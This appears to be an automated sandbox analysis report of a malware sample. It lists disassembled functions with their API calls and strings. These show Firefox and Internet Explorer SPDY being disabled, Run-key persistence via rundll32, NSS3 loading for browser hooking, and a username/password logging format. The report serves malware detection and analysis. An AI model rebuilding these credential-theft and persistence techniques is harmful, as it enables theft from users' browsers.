API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
String ID:
API String ID: 4053378866-0
Opcode ID: 25ff08050e3416bee1b54c9d2c75079ecf20ca030413f4f19107af7d62efe5c5
Instruction ID: f6f6051023f8d8f91158275f23297ec7823447b2e66bc4822d48092875e16bc2
Opcode Fuzzy Hash: 25ff08050e3416bee1b54c9d2c75079ecf20ca030413f4f19107af7d62efe5c5
Instruction Fuzzy Hash: AF315270408705AFDB11AF68DC88A6EBBBDFB44354F004B29F565D21A0DB709E49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C91C76, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 164memorythreadsleepCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00C91CAF
memset.NTDLL ref: 00C91CC3

Part of subcall function 00CA672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00C91CDF,00000000,00000000,?,?,00000000,?,?,?,00C91CDF,TorClient), ref: 00CA6765
Part of subcall function 00CA672D: RtlAllocateHeap.NTDLL(00000000,00C91CDF), ref: 00CA6779
Part of subcall function 00CA672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00C91CDF,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA6793
Part of subcall function 00CA672D: RegCloseKey.KERNELBASE(?,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA67BD

GetCurrentThreadId.KERNEL32 ref: 00C91D52
GetCurrentThread.KERNEL32 ref: 00C91D65
RtlEnterCriticalSection.NTDLL(07D18D20), ref: 00C91E0C
Sleep.KERNEL32(0000000A), ref: 00C91E16
RtlLeaveCriticalSection.NTDLL(07D18D20), ref: 00C91E3C
HeapFree.KERNEL32(00000000,?), ref: 00C91E6A
HeapFree.KERNEL32(00000000,00000018), ref: 00C91E7D

Strings

TorClient, xrefs: 00C91CD5

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
String ID: TorClient
API String ID: 1146182784-3399603969
Opcode ID: 7e9e0024ff37180079a834600ad74f5fb0cac001372187f249cdebb62cfa9714
Instruction ID: 04a0493e9b33bbbb683651becace98f3ff88cb5cb323215266a56bd36b7366a7
Opcode Fuzzy Hash: 7e9e0024ff37180079a834600ad74f5fb0cac001372187f249cdebb62cfa9714
Instruction Fuzzy Hash: 345119B55043069FDB10DF29E889A5EBBE8FB48744F040A2EF995D3261D730DE08DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00CAA098, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 116registrysynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 00CA88D9
Part of subcall function 00CA888D: lstrlenW.KERNEL32(?,?,00000000), ref: 00CA88E5
Part of subcall function 00CA888D: memset.NTDLL ref: 00CA892D
Part of subcall function 00CA888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00CA8948
Part of subcall function 00CA888D: lstrlenW.KERNEL32(0000002C), ref: 00CA8980
Part of subcall function 00CA888D: lstrlenW.KERNEL32(?), ref: 00CA8988
Part of subcall function 00CA888D: memset.NTDLL ref: 00CA89AB
Part of subcall function 00CA888D: wcscpy.NTDLL ref: 00CA89BD

WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles,prefs.js,?,00000000,00000000,00000001), ref: 00CAA12B
RegOpenKeyA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,?), ref: 00CAA15A
RegCloseKey.ADVAPI32(?), ref: 00CAA17F
WaitForSingleObject.KERNEL32(00000000), ref: 00CAA1C2
RtlExitUserThread.NTDLL(?), ref: 00CAA1F8

Part of subcall function 00C97365: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,74785520,?,?,00CA1386,00000000,?,?), ref: 00C97383
Part of subcall function 00C97365: GetFileSize.KERNEL32(00000000,00000000,?,?,00CA1386,00000000,?,?,?,?,00000000,00C91589,?,00000000,?,00CA5B4A), ref: 00C97393
Part of subcall function 00C97365: CloseHandle.KERNEL32(000000FF,?,?,00CA1386,00000000,?,?,?,?,00000000,00C91589,?,00000000,?,00CA5B4A,?), ref: 00C973F5

Part of subcall function 00CA4241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,00CA1ED8), ref: 00CA4282
Part of subcall function 00CA4241: GetLastError.KERNEL32 ref: 00CA428C
Part of subcall function 00CA4241: WaitForSingleObject.KERNEL32(000000C8), ref: 00CA42B1
Part of subcall function 00CA4241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 00CA42D2
Part of subcall function 00CA4241: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 00CA42FA
Part of subcall function 00CA4241: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 00CA430F
Part of subcall function 00CA4241: SetEndOfFile.KERNEL32(00000006), ref: 00CA431C
Part of subcall function 00CA4241: CloseHandle.KERNEL32(00000006), ref: 00CA4334

Strings

user_pref("network.http.spdy.enabled", false);, xrefs: 00CAA0E3, 00CAA0F9
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 00CAA150
prefs.js, xrefs: 00CAA0B0
%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 00CAA0B5
EnableSPDY3_0, xrefs: 00CAA16E

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserWritewcscpy
String ID: user_pref("network.http.spdy.enabled", false);$%APPDATA%\Mozilla\Firefox\Profiles$EnableSPDY3_0$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings$prefs.js
API String ID: 796380773-3405794569
Opcode ID: c28db6f2122536188974d4b63894f22238dbec2361ea03b20486c52e67d847c3
Instruction ID: baf1da6d0d1fc27174545e85de4f691d0dad72ec75b89b37dd2f6a2f0fbf4a23
Opcode Fuzzy Hash: c28db6f2122536188974d4b63894f22238dbec2361ea03b20486c52e67d847c3
Instruction Fuzzy Hash: 3341A271A00209FFEB14EBA4CC46FEEBBB9EB05714F100129F615B3291EBB09A41DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CAF83B, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 114registrymemoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 00CAF853
RtlEnterCriticalSection.NTDLL(00000000), ref: 00CAF894
RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00CAF8A8
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00CAF8FD
HeapFree.KERNEL32(00000000,?,?,00000000,00000000), ref: 00CAF947
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00CAF955
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00CAF960

Part of subcall function 00C93F5D: RegCreateKeyA.ADVAPI32(80000001,00000057,00C920D2), ref: 00C93F71
Part of subcall function 00C93F5D: memcpy.NTDLL(00000000,?,00C920D2,00C920D2,-00000005,?,00C9488A,Scr,00000000,-00000005,00000001,?,?,?,00C96516,00000000), ref: 00C93F9A
Part of subcall function 00C93F5D: RegCloseKey.ADVAPI32(00C920D2,?,00C9488A,Scr,00000000,-00000005,00000001,?,?,?,00C96516,00000000,Scr,?,?,747DF710), ref: 00C93FEE

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00CAF89E
rundll32, xrefs: 00CAF906, 00CAF90B
Client32, xrefs: 00CAF864

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
String ID: Client32$Software\Microsoft\Windows\CurrentVersion\Run$rundll32
API String ID: 2070110485-668865654
Opcode ID: cd22fbb29b7a9e33a05a18d1956360c0a1a5a84d8ba833b81fd98518817178a8
Instruction ID: 9e25a6f560602bbf6a008e1ef14a93ee285f9528aa588eb770253c98baedfda5
Opcode Fuzzy Hash: cd22fbb29b7a9e33a05a18d1956360c0a1a5a84d8ba833b81fd98518817178a8
Instruction Fuzzy Hash: DC31C671A00212FBDB215FA5DC84F6F77B9EB46B48F240138F512E60A1DB70CE42D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C947A0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C,767FD3B0,00000000,?,?,?,?,00C96516,00000000,Scr,?,?,747DF710,00000000,00000000), ref: 00C947C5
StrChrA.SHLWAPI(00000001,0000002C,?,?,?,00C96516,00000000,Scr,?,?,747DF710,00000000,00000000,?,?,00CB58C6), ref: 00C947D8
StrTrimA.SHLWAPI(?,20000920,?,?,?,00C96516,00000000,Scr,?,?,747DF710,00000000,00000000,?,?,00CB58C6), ref: 00C947FB
StrTrimA.SHLWAPI(00000001,20000920,?,?,?,00C96516,00000000,Scr,?,?,747DF710,00000000,00000000,?,?,00CB58C6), ref: 00C9480A
lstrlen.KERNEL32(?,?,?,?,00C96516,00000000,Scr,?,?,747DF710,00000000,00000000,?,?,00CB58C6,?), ref: 00C9483F
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 00C94852
lstrcpy.KERNEL32(00000004,?), ref: 00C94870
HeapFree.KERNEL32(00000000,00000000,Scr,00000000,-00000005,00000001,?,?,?,00C96516,00000000,Scr,?,?,747DF710,00000000), ref: 00C94896

Strings

W, xrefs: 00C947AF
Scr, xrefs: 00C9487A, 00C948CC

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateFreelstrcpylstrlen
String ID: Scr$W
API String ID: 1974185407-3281027876
Opcode ID: 6af0d5f4b485b170a1732bdb41a343e7775929e39c65e2741542c6f61ca8caf8
Instruction ID: 3e95b7f8aa146e7b0f99e85f387fb5c9e5a530f0000dd1f5cd4a74e97efa8694
Opcode Fuzzy Hash: 6af0d5f4b485b170a1732bdb41a343e7775929e39c65e2741542c6f61ca8caf8
Instruction Fuzzy Hash: 99319D35900248FEDB109BA5DC48FAE7FBCEF05750F144566F806D7290E7709A46DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1F6E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 103memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA06E2: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00CA0714
Part of subcall function 00CA06E2: HeapFree.KERNEL32(00000000,00000000,?,?,00CA1F8A,?,00000022,00000000,00000000,00000000,?,?), ref: 00CA0739

Part of subcall function 00CA4151: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00CA1FAB,?,?,?,?,?,00000022,00000000,00000000), ref: 00CA418B
Part of subcall function 00CA4151: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,00CA1FAB,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 00CA41D7

lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00CA1FE0
lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00CA1FE8
lstrlen.KERNEL32(?), ref: 00CA1FF2
RtlAllocateHeap.NTDLL(00000000,?), ref: 00CA2007
wsprintfA.USER32 ref: 00CA203C
HeapFree.KERNEL32(00000000,00000000,0000011E,00000000,00000000,00000000), ref: 00CA205E
HeapFree.KERNEL32(00000000,?), ref: 00CA2073
HeapFree.KERNEL32(00000000,?), ref: 00CA2080
HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00CA208E

Strings

URL: %suser=%spass=%s, xrefs: 00CA2036

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$lstrlen$Allocate$wsprintf
String ID: URL: %suser=%spass=%s
API String ID: 168057987-1589266237
Opcode ID: 2defc69ca9a59a97a4e8a57a8bb5657ff3f89bbde85f612a4078c658d3a54dab
Instruction ID: ead603f03a6d258beebcff0bede31a7894e0d7e7bbbebda3c22675c82d0d2fb2
Opcode Fuzzy Hash: 2defc69ca9a59a97a4e8a57a8bb5657ff3f89bbde85f612a4078c658d3a54dab
Instruction Fuzzy Hash: B831C430604316BFCB21AFA49C45F5FBBA9EF85758F00052AF944D21A1DB708D14DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CA9695, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,00CA2509,?,?,00000000), ref: 00CA96A1
_aulldiv.NTDLL(?,00000000,54D38000,00000192), ref: 00CA96B7
_snwprintf.NTDLL ref: 00CA96DC
CreateFileMappingW.KERNEL32(000000FF,00CBE0D4,00000004,00000000,00001000,?,?,?,00000000,54D38000,00000192), ref: 00CA96F8
GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,00CA2509,?), ref: 00CA970A
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,00000000,54D38000,00000192), ref: 00CA9721
CloseHandle.KERNEL32(00000000,?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,00CA2509), ref: 00CA9742
GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,00CA2509,?), ref: 00CA974A

Strings

Local\, xrefs: 00CA96CB

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: Local\
API String ID: 1814172918-422136742
Opcode ID: 9db787f4e54d5ce55d0dac9787a41ac353ea1c5f03b9ea6add8601ae9fdbce9a
Instruction ID: 9cc25c72bcbffccacd835b89d7a56d7661f7e58c8d562cae5e6c641c71002f94
Opcode Fuzzy Hash: 9db787f4e54d5ce55d0dac9787a41ac353ea1c5f03b9ea6add8601ae9fdbce9a
Instruction Fuzzy Hash: E6213372640204BBC710AF68EC06FDE37BCEB85754F244125FA05E72D0DA70AA09DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C95BD5, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSPR4.DLL,?,?,00000000), ref: 00C95BEE
LoadLibraryA.KERNEL32(NSS3.DLL,?,00000000), ref: 00C95BFC
LoadLibraryA.KERNEL32(xul.dll,?,00000000), ref: 00C95C11
GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 00C95C1F
GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 00C95C2C

Strings

NSPR4.DLL, xrefs: 00C95BDE, 00C95BE3
PR_GetError, xrefs: 00C95C19
NSS3.DLL, xrefs: 00C95BF6, 00C95BFB
xul.dll, xrefs: 00C95C0C
PR_SetError, xrefs: 00C95C21

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad$AddressProc
String ID: NSPR4.DLL$NSS3.DLL$PR_GetError$PR_SetError$xul.dll
API String ID: 1469910268-282796573
Opcode ID: 53785cfac44351c82e2ee9d4863bc7b3932344736e2d5439fcd7e8bf7cf1bef4
Instruction ID: 3db5ed8869a1a12dbb93001e3fd6f56ce572abe6aced08633a42dbb0d96ddf96
Opcode Fuzzy Hash: 53785cfac44351c82e2ee9d4863bc7b3932344736e2d5439fcd7e8bf7cf1bef4
Instruction Fuzzy Hash: 25215E71A417129BCB01DBADED85F5D77E8E748B12F04022AF50AD73E0F7B188418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00C98334, Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,74785520), ref: 00C9836A
RtlAllocateHeap.NTDLL(00000000,00000104), ref: 00C9837F
RegCreateKeyA.ADVAPI32(80000001,?), ref: 00C983A7
HeapFree.KERNEL32(00000000,?), ref: 00C983E8
HeapFree.KERNEL32(00000000,00000000), ref: 00C983F8
RtlAllocateHeap.NTDLL(00000000,00CAAEC6), ref: 00C9840B
RtlAllocateHeap.NTDLL(00000000,00CAAEC6), ref: 00C9841A
HeapFree.KERNEL32(00000000,00000000,?,00CAAEC6,00000000,?,?,?), ref: 00C98464
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00CAAEC6,00000000,?,?,?), ref: 00C98488
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00CAAEC6,00000000,?,?), ref: 00C984AD
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00CAAEC6,00000000,?,?), ref: 00C984C2

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$CloseCreate
String ID:
API String ID: 4126010716-0
Opcode ID: 3ed087a75cfe0e3eb8d41c00f7494df9042b19c4f394a3316050387fbec9fd6b
Instruction ID: 6865b0261462e327b89d5f7e52c4c6f64eb9c4118f48e8d1c545db1722ed4413
Opcode Fuzzy Hash: 3ed087a75cfe0e3eb8d41c00f7494df9042b19c4f394a3316050387fbec9fd6b
Instruction Fuzzy Hash: E351AEB580021AEFDF11DF94DC84AEEBBB9FF08345F10856AE516A2260D7319E58DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CB27DB, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00CB0745,00000000), ref: 00CB27F5
RtlAllocateHeap.NTDLL(00000000,00000024), ref: 00CB280A
memset.NTDLL ref: 00CB2817
HeapFree.KERNEL32(00000000,00000000,?,00CB0744,?,?,00000000,?,00000000,00CA279E,?,00000000), ref: 00CB2834
memcpy.NTDLL(?,?,00CB0744,?,00CB0744,?,?,00000000,?,00000000,00CA279E,?,00000000), ref: 00CB2855

Strings

Transfer-Encoding:, xrefs: 00CB28B2
Referer: , xrefs: 00CB28D3
chun, xrefs: 00CB28C3
Content-Length:, xrefs: 00CB2885

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocate$Freememcpymemset
String ID: Content-Length:$Referer: $Transfer-Encoding:$chun
API String ID: 2362494589-2246273904
Opcode ID: 384592cfb75ee7c740a483f71e1e863babaf8a9537c86a321eecee92c3c9226a
Instruction ID: 7326f702ec46693e96875acebc64505ced1a3aa02175168c2f9bd372f8bd8862
Opcode Fuzzy Hash: 384592cfb75ee7c740a483f71e1e863babaf8a9537c86a321eecee92c3c9226a
Instruction Fuzzy Hash: 0D31C132600701AFD7319F66CC45BA7BBE9EF14710F00452AF85A972A0D771EE05DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CAFC77, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 00CAFC92
RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 00CAFD43

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 00CAFCE0
GetProcAddress.KERNEL32(00000000,WABOpen), ref: 00CAFCF2
GetLastError.KERNEL32(?,00000008,?,00000001), ref: 00CAFD11
FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 00CAFD23
GetLastError.KERNEL32(?,00000008,?,00000001), ref: 00CAFD2B

Strings

Software\Microsoft\WAB\DLLPath, xrefs: 00CAFC83
WABOpen, xrefs: 00CAFCEC

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
String ID: Software\Microsoft\WAB\DLLPath$WABOpen
API String ID: 1628847533-1249168598
Opcode ID: 1484bbc628e3767d3db504a7f21b5c9c2ecc4a42f6910283ba7348480cc347e3
Instruction ID: b13ebb3ed3f6463a4cb0d1e69e85e80418d8cc7f6230d860d64329d323e2b368
Opcode Fuzzy Hash: 1484bbc628e3767d3db504a7f21b5c9c2ecc4a42f6910283ba7348480cc347e3
Instruction Fuzzy Hash: 6821A171D0011ABFCB226FE5AC48E9EBB7CEB95358F204679F952A3120D7704E46DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C97EAA, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,00000020), ref: 00C97EC2
StrChrA.SHLWAPI(00000001,00000020), ref: 00C97ED3

Part of subcall function 00C9686F: lstrlen.KERNEL32(?,?,00000000,00000000,?,00CA5C96,00000000,Referer: ,?,00000000,00000001), ref: 00C96881
Part of subcall function 00C9686F: StrChrA.SHLWAPI(?,0000000D,?,00CA5C96,00000000,Referer: ,?,00000000,00000001), ref: 00C968B9

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00C97F0C
memcpy.NTDLL(00000000,http://,00000007), ref: 00C97F32
memcpy.NTDLL(00000000,?,?,00000000,http://,00000007), ref: 00C97F41
memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007), ref: 00C97F53

Strings

https://, xrefs: 00C97F1E
Host:, xrefs: 00C97EE3
http://, xrefs: 00C97F27, 00C97F30

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID: Host:$http://$https://
API String ID: 1819133394-2811860193
Opcode ID: 2e818e9e38d6c8b43b62ea65961662d5b9080dfa8ef2e89dcac8f5e779109052
Instruction ID: 5b9ec814b9fdea5a28be294af9481082d47b67ab2a439cbcbce619d6fae3fb09
Opcode Fuzzy Hash: 2e818e9e38d6c8b43b62ea65961662d5b9080dfa8ef2e89dcac8f5e779109052
Instruction Fuzzy Hash: CB219372500209BBDF119FA9CC85F9EBBACEF04784F144161F904EB251D670EE41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA209D, Relevance: 15.3, APIs: 10, Instructions: 274memorythreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 00CA2114
VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 00CA2133
GetLastError.KERNEL32 ref: 00CA23F0
RtlEnterCriticalSection.NTDLL(?), ref: 00CA2400
RtlLeaveCriticalSection.NTDLL(?), ref: 00CA2411
RtlExitUserThread.NTDLL(?), ref: 00CA241F

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AllocCriticalSectionVirtual$EnterErrorExitLastLeaveThreadUser
String ID:
API String ID: 2137648861-0
Opcode ID: 6c902c1d3988cda2e9d92809a397532c295aeec68e69c8be7912a1d4a414dd55
Instruction ID: ef33cb921cf9966b440412ffc5d304116c812c951f2d96cba92633c4fcfb6c25
Opcode Fuzzy Hash: 6c902c1d3988cda2e9d92809a397532c295aeec68e69c8be7912a1d4a414dd55
Instruction Fuzzy Hash: 34A12A7150025AAFDB209F29CC84BAA7BBDFB1A309F104629FA66D2161E734DD49CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00C9EC30, Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000,?,00C96222,00CBD4E4,?,?,00000004,00000000,?,00000000,00C9B275,?,?), ref: 00C9EC7D
VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,00C96222,00CBD4E4,?,?,00000004,00000000,?,00000000,00C9B275), ref: 00C9EC8F
lstrcpy.KERNEL32(00000000,?), ref: 00C9EC9E
VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,00C96222,00CBD4E4,?,?,00000004,00000000,?,00000000,00C9B275), ref: 00C9ECAF
VirtualProtect.KERNEL32(?,00000005,00000040,-0000001C,00CBA4F8,00000018,00C97458,?,00000000,?,00C96222,00CBD4E4,?,?,00000004,00000000), ref: 00C9ECE5
VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,00C96222,00CBD4E4,?,?,00000004,00000000,?,00000000,00C9B275), ref: 00C9ED00
VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,00CBA4F8,00000018,00C97458,?,00000000,?,00C96222,00CBD4E4,?,?,00000004,00000000), ref: 00C9ED15
VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,00CBA4F8,00000018,00C97458,?,00000000,?,00C96222,00CBD4E4,?,?,00000004,00000000), ref: 00C9ED42
VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,00C96222,00CBD4E4,?,?,00000004,00000000,?,00000000,00C9B275), ref: 00C9ED5C
GetLastError.KERNEL32(?,00000000,?,00C96222,00CBD4E4,?,?,00000004,00000000,?,00000000,00C9B275,?,?), ref: 00C9ED63

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
String ID:
API String ID: 3676034644-0
Opcode ID: 5540ea5d6401b0511e882ce03f86adf593a6eb7e04031205c7a8caaf4e950034
Instruction ID: 520c1b0d03a613dccad6b5bc0e15284e043fa3c45c48a54271a890ff88a6beb0
Opcode Fuzzy Hash: 5540ea5d6401b0511e882ce03f86adf593a6eb7e04031205c7a8caaf4e950034
Instruction Fuzzy Hash: 89413C72900709AFDF21DF64CC48FAEB7B8BF18310F048619E666A65A0D734E906DF20

Uniqueness

Uniqueness Score: -1.00%

Function 00CA0E10, Relevance: 15.1, APIs: 10, Instructions: 94filememorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C98BC3: memset.NTDLL ref: 00C98BE5
Part of subcall function 00C98BC3: CloseHandle.KERNEL32(?,?,?,?,?), ref: 00C98C92

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 00CA0E57
CloseHandle.KERNEL32(?), ref: 00CA0E63
PathFindFileNameW.SHLWAPI(?), ref: 00CA0E73
lstrlenW.KERNEL32(00000000), ref: 00CA0E7D
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00CA0E8E
wcstombs.NTDLL ref: 00CA0E9F
lstrlen.KERNEL32(?), ref: 00CA0EAC
UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 00CA0EE2
HeapFree.KERNEL32(00000000,00000000), ref: 00CA0EF4
DeleteFileW.KERNEL32(?), ref: 00CA0F02

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
String ID:
API String ID: 2256351002-0
Opcode ID: b12ff61cec15379119fc98cfb26aa059416b9eceac969b699a4613dd58192859
Instruction ID: ed35f4298598cac357b379d36840ee9e0378dfb96bb8d6c082e8bcc528a42960
Opcode Fuzzy Hash: b12ff61cec15379119fc98cfb26aa059416b9eceac969b699a4613dd58192859
Instruction Fuzzy Hash: 7A31277180010AEFCF21AFA4ED89AAF7F79FF05385F144569F612A2161DB318E15DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CB59F7, Relevance: 15.1, APIs: 10, Instructions: 64sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00C98A31,?,00000000,00CB0F94,00000000,00000000), ref: 00CB5A0B

Part of subcall function 00CA51FB: InterlockedExchange.KERNEL32(00000002,000000FF), ref: 00CA5202

WaitForSingleObject.KERNEL32(?,000000FF,0000003C,?,00000000,00CB0F94,00000000,00000000), ref: 00CB5A25
CloseHandle.KERNEL32(?,?,00000000,00CB0F94,00000000,00000000), ref: 00CB5A2E
CloseHandle.KERNEL32(?,0000003C,?,00000000,00CB0F94,00000000,00000000), ref: 00CB5A3C
RtlEnterCriticalSection.NTDLL(00000008), ref: 00CB5A48
RtlLeaveCriticalSection.NTDLL(00000008), ref: 00CB5A71
